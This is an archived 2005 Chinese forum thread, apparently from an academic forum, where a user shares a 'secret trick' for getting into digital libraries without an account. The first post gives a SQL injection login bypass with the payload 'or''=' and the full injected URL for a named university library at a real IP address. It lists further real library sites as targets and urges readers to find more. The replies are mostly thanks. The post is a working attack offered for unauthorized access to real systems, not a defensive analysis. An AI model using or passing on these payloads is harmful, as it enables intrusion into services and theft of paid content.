版块导航: 正在加载中...

登录注册

应《网络安全法》要求，自2017年10月1日起，未进行实名认证将不得使用互联网跟帖服务。为保障您的帐号能够正常使用，请尽快对帐号进行手机号验证，感谢您的理解与支持！

24小时热门版块排行榜

返回列表

当前主题已经存档。

applepie119

木虫 (著名写手)

应助: 0 (幼儿园)
金币: 2997.2
红花: 11
帖子: 1124
在线: 22.1小时
虫号: 90394
注册: 2005-09-01
专业: 临床药理

[交流] [分享]新发现利用asp漏洞进超星图书馆秘技

[分享]新发现利用asp漏洞进超星图书馆秘技
这是在看了论坛上的一个帖子后测试找出来的，特向菜鸟们推荐，
希望对大家有所帮助！
深圳广播电视大学数字图书馆
http://218.17.219.22/bookhtm/index.asp
搜索需要输入用户名、密码
我们可以构造查询条件，突破限制
做法如下：
1.随便输入学号、密码，登陆，例如：学号=1,密码=1.这时会出现“此用户不存在！返回”
ie地址栏中地址为：http://218.17.219.22/bookhtm/sq/ ... ;B1.x=31&B1.y=6
2.修改地址进入：
将上面地址中user=1&mima=1改为:user='or''='&mima='or''='
或者user='or'1'='1&mima='or'1'='1 也可
即：http://218.17.219.22/bookhtm/sq/load.asp?user='or''='&mima='or''='&B1.x=31&B1.y=6
就是登陆地址了。
3.登陆后可以随便看了
同样的道理利用这个漏洞，可以登陆另外几个需要输入用户名、密码的站点,需要输入的地方都输上'or''='
如：驻马店电大：http://www.zmdtvu.net/dabookhtm/
铜陵电大：http://218.22.180.149/index.asp其他的自己好好发掘吧，^_^

回复此楼

» 猜你喜欢

化学工程085602 305分求调剂已经有10人回复
289求调剂已经有15人回复
291 求调剂已经有7人回复
274求调剂已经有14人回复
北京林业大学硕导招生广告已经有3人回复
309求调剂已经有5人回复
292求调剂已经有8人回复
求调剂已经有4人回复
一志愿西北大学总分282 英语一62 求调剂已经有3人回复
调剂310 已经有4人回复

1楼 2005-09-04 12:30:18

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

cyjcyj

木虫 (正式写手)

应助: 0 (幼儿园)
金币: 2682.8
帖子: 315
在线: 62.5小时
虫号: 26234
注册: 2003-10-15
专业: 群落生态学

0.5

非常好。谢谢。

回复此楼

2楼2005-09-04 15:59:00

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

水★火

0.5

3楼2005-09-04 21:49:19

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

jaylee

木虫 (小有名气)

应助: 0 (幼儿园)
金币: 2059.2
帖子: 171
在线: 13.3小时
虫号: 5772
注册: 2003-04-03
专业: 医学超声与声学造影剂

0.5

好像不是新技巧

回复此楼

4楼2005-09-04 22:38:39

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

superjdhxc

1

5楼2005-09-06 11:04:14

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

cruise

1

6楼2005-09-06 12:00:27

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

onefan

应助: (幼儿园)
在线:
虫号: 49871

0.5

thank you very much!

赞一下

回复此楼

7楼2005-09-10 20:45:41

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

728728

木虫 (正式写手)

应助: 4 (幼儿园)
金币: 4940.1
散金: 239
帖子: 519
在线: 397.7小时
虫号: 92818
注册: 2005-09-11
性别: GG
专业: 可再生与替代能源利用中的

0.5

very good

回复此楼

8楼2005-09-15 23:32:21

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

minister6

新虫 (初入文坛)

应助: 0 (幼儿园)
金币: 2.9
帖子: 2
在线: 10分钟
虫号: 62400
注册: 2005-03-16

1

thank you!!!!!!!!

赞一下

回复此楼

9楼2005-10-07 13:20:51

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

hmmcsu161

木虫 (小有名气)

应助: 0 (幼儿园)
金币: 2030.9
帖子: 101
在线: 4.5小时
虫号: 45266
注册: 2004-05-08
专业: 科学学与科技管理

1

good

回复此楼

10楼2005-10-08 15:28:00

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

相关版块跳转我要订阅楼主 applepie119 的主题更新

返回列表

最具人气热帖推荐 [查看全部]		作者	回/看	最后发表

[考研] 一志愿西北大学总分282 英语一62 求调剂 +3	18419759900 2026-03-25	3/150	2026-03-25 23:20 by peike
[考研] 材料调剂 5+3	想要一壶桃花水 2026-03-25	6/300	2026-03-25 18:20 by xcjcqu
[考研] 考研一志愿苏州大学初始315（英一）求调剂 +3	sbdksD 2026-03-24	4/200	2026-03-25 18:16 by xcjcqu
[考研] 302求调剂 +4	锦衣卫藤椒 2026-03-25	4/200	2026-03-25 16:29 by 功夫疯狂
[考研] 0854电子信息求调剂 +7	α____ 2026-03-22	9/450	2026-03-25 13:37 by α____
[考研] 278求调剂 +4	我可以上岸的对� 2026-03-19	4/200	2026-03-25 11:01 by userper
[考研] 085601求调剂总分293英一数二 +3	钢铁大炮 2026-03-24	3/150	2026-03-24 22:03 by bingxueer79
[考研] 调剂 +4	13853210211 2026-03-24	4/200	2026-03-24 19:44 by ms629
[考研] 化工专硕求调剂 +3	question挽风 2026-03-24	3/150	2026-03-24 18:48 by jhhcooi
[考研] 一志愿北京化工大学 070300 学硕 336分求调剂 +7	vv迷 2026-03-22	7/350	2026-03-23 23:44 by Txy@872106
[考研] 350求调剂 +6	weudhdk 2026-03-19	6/300	2026-03-23 15:47 by tangyuan0840221
[考研] 298求调剂 +8	上岸6666@ 2026-03-20	8/400	2026-03-23 11:02 by laoshidan
[考研] 306求调剂 +5	来好运来来来 2026-03-22	5/250	2026-03-22 16:17 by BruceLiu320
[考研] 一志愿中南化学（0703）总分337求调剂 +9	niko- 2026-03-19	10/500	2026-03-22 16:08 by ColorlessPI
[考研] 求调剂院校信息 +6	CX 330 2026-03-21	6/300	2026-03-22 15:25 by 无懈可击111
[考研] 初试 317 +7	半拉月丙 2026-03-20	7/350	2026-03-21 22:26 by peike
[考研] 求调剂 +3	13341 2026-03-20	3/150	2026-03-21 18:28 by 学员8dgXkO
[考研] 353求调剂 +3	拉钩不许变 2026-03-20	3/150	2026-03-20 19:56 by JourneyLucky
[考研] 求调剂 +3	eation27 2026-03-20	3/150	2026-03-20 19:32 by JourneyLucky
[考研] 材料学硕318求调剂 +5	February_Feb 2026-03-19	5/250	2026-03-19 23:51 by 23Postgrad